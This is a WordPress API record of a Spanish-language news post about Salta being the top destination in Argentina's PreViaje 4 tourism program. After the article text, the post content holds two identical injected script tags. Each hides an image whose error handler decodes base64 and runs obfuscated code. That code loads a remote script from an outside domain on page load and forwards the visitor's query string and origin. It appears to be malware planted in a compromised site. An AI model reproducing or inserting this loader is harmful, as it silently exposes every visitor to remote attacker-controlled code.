{"id":2568,"date":"2023-04-27T17:59:26","date_gmt":"2023-04-27T20:59:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2568"},"modified":"2025-08-14T00:17:57","modified_gmt":"2025-08-14T03:17:57","slug":"salta-fue-el-destino-mas-elegido-en-la-cuarta-edicion-de-previaje","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2568","title":{"rendered":"Salta fue el destino m\u00e1s elegido en la cuarta edici\u00f3n de PreViaje"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Lo confirm\u00f3 el ministro de Turismo y Deportes de la Naci\u00f3n durante una conferencia de prensa realizada en Salta. Se estima que con miles de turistas que durante mayo y junio visitar\u00e1n la provincia, habr\u00e1 un impacto econ\u00f3mico superior a los 6 mil millones de pesos por compras en el programa y superior a los 10 mil millones de manera indirecta.<\/em><\/h4>\n\n\n\n<p>Los ministros de Turismo y Deportes de Naci\u00f3n y Provincia,&nbsp;<strong>Mat\u00edas Lammens<\/strong>&nbsp;y&nbsp;<strong>Mario Pe\u00f1a<\/strong>, acompa\u00f1ados por el presidente de la C\u00e1mara de Turismo Gustavo Di Mecola, informaron este mediod\u00eda que la provincia de Salta fue el destino m\u00e1s elegido en PreViaje 4. El funcionario nacional asegur\u00f3: \u201cSalta es el destino m\u00e1s elegido de Previaje 4 para mayo y junio, y no es ninguna casualidad, es fruto de un trabajo enorme que ha hecho este equipo que lidera el gobernador S\u00e1enz y el trabajo que se realiza con el sector privado\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-video\"><video controls src=\"blob:https:\/\/circuitosalta.com.ar\/1fd4ff16-4608-4097-8976-49bf6f01f8e8\"><\/video><\/figure>\n\n\n\n<p>Por otra parte, el funcionario nacional destac\u00f3 que \u201ceste PreViaje va a tener un impacto enorme en todo el pa\u00eds, pero especialmente en Salta va a tener un impacto de compras directas de m\u00e1s de 6.000 millones de pesos; y entre compras indirectas e indirectas con lo que gasta el turista una vez que est\u00e1 en destino, ser\u00e1 superior a los 10.000 millones de pesos; m\u00e1s de 75.000 turistas van a estar visitando Salta en temporada baja con el previaje\u201d.<\/p>\n\n\n\n<p>Lammens tambi\u00e9n destac\u00f3 otros factores positivos del programa, principalmente el esp\u00edritu de impacto federal \u201cporque desde los grandes centros urbanos se viaja a todos los destinos del pa\u00eds, adem\u00e1s contribuye en un marco de igualdad a la formalidad del sector\u201d.<\/p>\n\n\n\n<p>En tanto, el ministro Pe\u00f1a se refiri\u00f3 a que liderar el ranking del Previaje 4 es parte de una pol\u00edtica de Estado que se desarrolla en la Provincia y que se trabaja en articulaci\u00f3n con la Naci\u00f3n y el sector privado, \u201ces el \u00e9xito de todos\u201d. Asimismo, indic\u00f3 que el crecimiento de la conectividad de Salta con las provincias argentinas y con San Pablo es uno de los factores que contribuyen al incremento del turismo en la provincia; \u201ceste trabajo se suma a las acciones promocionales que se realizan\u201d.<\/p>\n\n\n\n<p>Gustavo Di M\u00e9cola indic\u00f3 que, \u00absin la articulaci\u00f3n con Provincia y Naci\u00f3n con el sector privado, es imposible conseguir estos resultados\u201d, adem\u00e1s el titular de la C\u00e1mara de Turismo de Salta destac\u00f3 \u201cla visi\u00f3n estrat\u00e9gica que significa este programa nacional\u201d. &nbsp;Por otra parte, defini\u00f3 la jornada de \u201cincre\u00edble, porque tenemos que sumar el anuncio de la empresa Latam de retomar la ruta Lima \u2013 Salta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-fue-el-destino-mas-elegido-en-la-cuarta-edicion-de-previaje-89371\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Lo confirm\u00f3 el ministro de Turismo y Deportes de la Naci\u00f3n durante una conferencia de prensa realizada en Salta. Se estima que con miles de turistas que durante mayo y junio visitar\u00e1n la provincia, habr\u00e1 un impacto econ\u00f3mico superior a los 6 mil millones de pesos por compras en el programa y superior a los [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2569,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-2568","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2568"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2568"}],"version-history":[{"count":5,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2568\/revisions"}],"predecessor-version":[{"id":7099,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2568\/revisions\/7099"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2569"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2568"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2568"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}